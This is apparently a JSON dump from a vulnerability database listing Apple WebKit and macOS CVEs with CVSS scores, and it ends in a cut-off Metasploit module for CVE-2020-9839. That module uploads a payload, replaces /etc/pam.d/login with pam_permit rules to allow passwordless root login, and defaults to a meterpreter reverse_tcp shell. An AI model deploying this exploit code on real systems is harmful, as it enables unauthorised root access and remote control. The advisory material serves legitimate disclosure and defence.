"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9512"], "modified": "2015-02-12T00:00:00", "id": "UB:CVE-2014-9512", "href": "https://ubuntu.com/security/CVE-2014-9512", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-11-29T14:10:41", "description": "A memory corruption issue was addressed with improved state management.\nThis issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS\n6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2,\niCloud for Windows 7.19. Processing maliciously crafted web content may\nlead to arbitrary code execution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-13T00:00:00", "type": "ubuntucve", "title": "CVE-2020-9807", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9807"], "modified": "2020-07-13T00:00:00", "id": "UB:CVE-2020-9807", "href": "https://ubuntu.com/security/CVE-2020-9807", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-29T14:10:41", "description": "A logic issue was addressed with improved restrictions. This issue is fixed\nin iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1,\niTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows\n7.19. Processing maliciously crafted web content may lead to universal\ncross site scripting.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2020-07-13T00:00:00", "type": "ubuntucve", "title": "CVE-2020-9805", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9805"], "modified": "2020-07-13T00:00:00", "id": "UB:CVE-2020-9805", "href": "https://ubuntu.com/security/CVE-2020-9805", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-11-29T14:10:41", "description": "An input validation issue was addressed with improved input validation.\nThis issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS\n6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2,\niCloud for Windows 7.19. Processing maliciously crafted web content may\nlead to a cross site scripting attack.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2020-07-13T00:00:00", "type": "ubuntucve", "title": "CVE-2020-9843", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9843"], "modified": "2020-07-13T00:00:00", "id": "UB:CVE-2020-9843", "href": "https://ubuntu.com/security/CVE-2020-9843", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "zdi": [{"lastseen": "2023-11-28T17:56:09", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Apple macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of file permisions. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges and execute code in the context of the root.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-28T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple macOS cfprefsd Time-Of-Check Time-Of-Use Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9839"], "modified": "2020-05-28T00:00:00", "id": "ZDI-20-681", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-681/", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T17:55:04", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AudioToolboxCore module. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-09T00:00:00", "type": "zdi", "title": "Apple macOS AudioToolboxCore CAF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9815"], "modified": "2020-07-09T00:00:00", "id": "ZDI-20-823", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-823/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T17:56:12", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of font files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-27T00:00:00", "type": "zdi", "title": "Apple macOS libFontParser Font Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9816"], "modified": "2020-05-27T00:00:00", "id": "ZDI-20-673", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-673/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T17:56:12", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. Interaction with the AudioToolbox library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the AudioToolbox framework. Crafted data in a CAF file can trigger a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-27T00:00:00", "type": "zdi", "title": "Apple macOS AudioToolboxCore CAF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9815"], "modified": "2020-05-27T00:00:00", "id": "ZDI-20-674", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-674/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T17:56:13", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AudioToolboxCore module. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-27T00:00:00", "type": "zdi", "title": "Apple macOS AudioToolboxCore AIFF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9791"], "modified": "2020-05-27T00:00:00", "id": "ZDI-20-671", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-671/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T17:56:13", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of the HasIndexedProperty DFG node. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-27T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple Safari In Operator JIT Type Confusion Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9850"], "modified": "2020-05-27T00:00:00", "id": "ZDI-20-672", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-672/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T17:56:08", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of the HasIndexedProperty DFG node. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-05-28T00:00:00", "type": "zdi", "title": "Apple Safari HasIndexedProperty Type Confusion Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9800"], "modified": "2020-05-28T00:00:00", "id": "ZDI-20-682", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-682/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-11-28T17:01:51", "description": "This Metasploit module exploits an arbitrary file write in cfprefsd on macOS versions 10.15.4 and below in order to run a payload as root. The CFPreferencesSetAppValue function, which is reachable from most unsandboxed processes, can be exploited with a race condition in order to overwrite an arbitrary file as root. By overwriting /etc/pam.d/login a user can then login as root with the login root command without a password.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-09-07T00:00:00", "type": "zdt", "title": "macOS cfprefsd Arbitrary File Write / Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9839"], "modified": "2020-09-07T00:00:00", "id": "1337DAY-ID-34914", "href": "https://0day.today/exploit/description/34914", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Post::File\n include Msf::Post::OSX::Priv\n include Msf::Post::OSX::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'macOS cfprefsd Arbitrary File Write Local Privilege Escalation',\n 'Description' => %q{\n This module exploits an arbitrary file write in cfprefsd on macOS <= 10.15.4 in\n order to run a payload as root. The CFPreferencesSetAppValue function, which is\n reachable from most unsandboxed processes, can be exploited with a race condition\n in order to overwrite an arbitrary file as root. By overwriting /etc/pam.d/login\n a user can then login as root with the `login root` command without a password.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Yonghwi Jin <jinmoteam[at]gmail.com>', # pwn2own2020\n 'Jungwon Lim <setuid0[at]protonmail.com>', # pwn2own2020\n 'Insu Yun <insu[at]gatech.edu>', # pwn2own2020\n 'Taesoo Kim <taesoo[at]gatech.edu>', # pwn2own2020\n 'timwr' # metasploit integration\n ],\n 'References' => [\n ['CVE', '2020-9839'],\n ['URL', 'https://github.com/sslab-gatech/pwn2own2020'],\n ],\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64,\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },\n 'Targets' => [\n [ 'Mac OS X x64 (Native Payload)', {} ],\n ],\n 'DisclosureDate' => 'Mar 18 2020'\n )\n )\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n @@target_file = \"/etc/pam.d/login\"\n @@original_content = %q(# login: auth account password session\nauth optional pam_krb5.so use_kcminit\nauth optional pam_ntlm.so try_first_pass\nauth optional pam_mount.so try_first_pass\nauth required pam_opendirectory.so try_first_pass\naccount required pam_nologin.so\naccount required pam_opendirectory.so\npassword required pam_opendirectory.so\nsession required pam_launchd.so\nsession required pam_uwtmp.so\nsession optional pam_mount.so\n)\n @@replacement_content = %q(# login: auth account password session\nauth optional pam_permit.so\nauth optional pam_permit.so\nauth optional pam_permit.so\nauth required pam_permit.so\naccount required pam_permit.so\naccount required pam_permit.so\npassword required pam_permit.so\nsession required pam_permit.so\nsession required pam_permit.so\nsession optional pam_permit.so\n)\n\n def check\n version = Gem::Version.new(get_system_version)\n if version > Gem::Version.new('10.15.4')\n CheckCode::Safe\n elsif version < Gem::Version.new('10.15')\n CheckCode::Safe\n else\n CheckCode::Appears\n end\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless writable? datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n payload_file = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}\"\n binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)\n upload_and_chmodx payload_file, binary_payload\n register_file_for_cleanup payload_file\n\n current_content = read_file(@@target_file)\n @restore_content = current_content\n\n if current_content == @@replacement_content\n print_warning(\"The contents of #{@@target_file} was already replaced\")\n elsif current_content != @@original_content\n print_warning(\"The contents of #{@@target_file} did not match the expected contents\")\n @restore_content = nil\n end\n\n exploit_file = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}\"\n exploit_exe = exploit_data 'CVE-2020-9839', 'exploit'\n upload_and_chmodx exploit_file, exploit_exe\n